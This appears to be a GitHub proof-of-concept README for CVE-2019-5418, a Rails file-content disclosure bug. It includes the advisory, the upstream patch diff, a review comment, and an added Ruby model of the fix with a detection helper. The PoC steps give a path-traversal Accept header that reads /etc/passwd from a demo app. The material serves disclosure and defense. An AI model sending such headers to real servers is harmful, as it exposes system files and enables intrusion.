
CVE-2019-5418 PoC — Action View Information Disclosure Vulnerability

Associated Vulnerability
Title: Action View Information Disclosure Vulnerability (CVE-2019-5418)
Description: Action View contains an information disclosure vulnerability. An attacker can exploit it to disclose file contents.
Description
CVE-2019-5418 - File Content Disclosure on Ruby on Rails
Readme
# CVE-2019-5418 - File Content Disclosure on Rails

**EDIT**: this CVE can lead to Remote Code Execution; more info: https://github.com/mpgn/Rails-doubletap-RCE

> There is a possible file content disclosure vulnerability in Action View.
> Specially crafted accept headers in combination with calls to `render file:`
> can cause arbitrary files on the target server to be rendered, disclosing the
> file contents.
>
> The impact is limited to calls to `render` which render file contents without
> a specified accept format. Impacted code in a controller looks something like
> this:

Found by [John Hawthorn](https://twitter.com/jhawthorn) from GitHub.

![image](https://user-images.githubusercontent.com/5891788/54474938-95f10c80-47eb-11e9-9a7c-8fa7c72ccd9e.png)

**Technical Analysis**: 
- https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/

**Security Advisory**:
- https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q

Fixed in Action View 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1 

```diff
From f4c70c2222180b8d9d924f00af0c7fd632e26715 Mon Sep 17 00:00:00 2001
From: John Hawthorn <john@hawthorn.email>
Date: Mon, 4 Mar 2019 18:24:51 -0800
Subject: [PATCH] Only accept formats from registered mime types

[CVE-2019-5418]
[CVE-2019-5419]
---
 .../lib/action_dispatch/http/mime_negotiation.rb   |  5 +++++
 actionpack/test/controller/mime/respond_to_test.rb | 10 ++++++----
 .../new_base/content_negotiation_test.rb           | 14 ++++++++++++--
 3 files changed, 23 insertions(+), 6 deletions(-)

diff --git a/actionpack/lib/action_dispatch/http/mime_negotiation.rb b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
index 498b1e669576..4e81ba12a58b 100644
--- a/actionpack/lib/action_dispatch/http/mime_negotiation.rb
+++ b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
@@ -79,6 +79,11 @@ def formats
           else
             [Mime[:html]]
           end
+
+          v = v.select do |format|
+            format.symbol || format.ref == "*/*"
+          end
+
           set_header k, v
         end
       end
```
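Review bot: the `select` added after the `else [Mime[:html]] end` branch can leave `v` empty when every entry in the Accept header lacks a registered `format.symbol` and none of them is `*/*`; nothing in this hunk shows how callers of `formats` behave on an empty array, so the changed `content_negotiation_test.rb` listed in the summary should assert that case explicitly. A one-line comment above the `select` saying why unregistered types are dropped (they otherwise flow into template lookup for `render file:`, per the advisory) would also help, since the commit message only cites the CVE ids.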

___

### Proof Of Concept

1. Run the vulnerable application inside the demo folder:

```console
foo@bar:~$ cd demo/
foo@bar:~$ bundle install
[...]
foo@bar:~$ rails s
=> Booting Puma
=> Rails 5.2.1 application starting in development 
=> Run `rails server -h` for more startup options
Puma starting in single mode...
* Version 3.12.0 (ruby 2.5.1-p57), codename: Llamas in Pajamas
* Min threads: 5, max threads: 5
* Environment: development
* Listening on tcp://0.0.0.0:3000
Use Ctrl-C to stop
Started GET "/" for 127.0.0.1 at 2019-03-16 13:00:00 +0100
Processing by Rails::WelcomeController#index as HTML
  Rendering /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb
  Rendered /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb (1.4ms)
Completed 200 OK in 8ms (Views: 2.7ms | ActiveRecord: 0.0ms)


Started GET "/chybeta" for 127.0.0.1 at 2019-03-16 13:00:03 +0100
Processing by ChybetaController#index as HTML
  Rendering README.md within layouts/application
  Rendered README.md within layouts/application (0.2ms)
Completed 200 OK in 122ms (Views: 121.1ms | ActiveRecord: 0.0ms)
```

2. Go to the route `/chybeta`.
3. Intercept the request with Burp and replace the `Accept` header with `Accept: ../../../../../../../../../../etc/passwd{{`.

![image](https://user-images.githubusercontent.com/5891788/54473502-fd519100-47d8-11e9-83f9-91abf2e9e2e0.png)


![image](https://user-images.githubusercontent.com/5891788/54474938-95f10c80-47eb-11e9-9a7c-8fa7c72ccd9e.png)
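To make concrete what the upstream `select` in f4c70c2 changes, here is an added example (not the PoC repo's or Rails' own code) that models the Accept-header negotiation with a constructed mime-type registry; `REGISTERED_MIME_TYPES`, `MediaType` and the helper names are assumptions, and the last function is a defender-side check on the entries the filter drops.

```ruby
# Added example (not Rails or PoC code): Accept negotiation before/after the CVE-2019-5418 fix.

# Constructed registry standing in for Rails' Mime::Type lookup table; only
# these media types carry a registered format symbol.
REGISTERED_MIME_TYPES = {
  "text/html"        => :html,
  "application/json" => :json,
  "application/xml"  => :xml,
  "text/plain"       => :text,
}.freeze

# Stand-in for Mime::Type: `ref` is the raw media type from the header,
# `symbol` the registered format symbol or nil for an unknown type.
MediaType = Struct.new(:ref, :symbol)

# Split one Accept value on commas, drop quality parameters, keep client order.
# Unknown strings still become MediaType objects, as in the vulnerable code.
def parse_accept(header)
  header.to_s.split(",").map do |entry|
    ref = entry.split(";").first.to_s.strip
    MediaType.new(ref, REGISTERED_MIME_TYPES[ref])
  end.reject { |type| type.ref.empty? }
end

# Pre-fix: every parsed entry is a candidate format, so a path-like Accept
# value reaches template lookup for `render file:`.
def formats_unpatched(header)
  parse_accept(header).map(&:ref)
end

# Post-fix, mirroring the `select` added in f4c70c2: only registered symbols
# survive, plus the `*/*` wildcard; the result may be empty.
def formats_patched(header)
  parse_accept(header)
    .select { |format| format.symbol || format.ref == "*/*" }
    .map(&:ref)
end

# Detection aid: dropped entries not even shaped like `type/subtype`
# (simplified RFC 7231 token grammar) never come from a legitimate client.
MEDIA_TYPE_SHAPE = %r{\A[\w.+!^-]+/[\w.+!^*-]+\z}

def suspicious_accept_entries(header)
  parse_accept(header)
    .reject { |format| format.symbol || format.ref == "*/*" }
    .map(&:ref)
    .reject { |ref| MEDIA_TYPE_SHAPE.match?(ref) }
end
```

`formats_patched` returning an empty array for the PoC's header is the fix's intended outcome, while `suspicious_accept_entries` is the kind of condition a request-log or WAF rule can key on.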
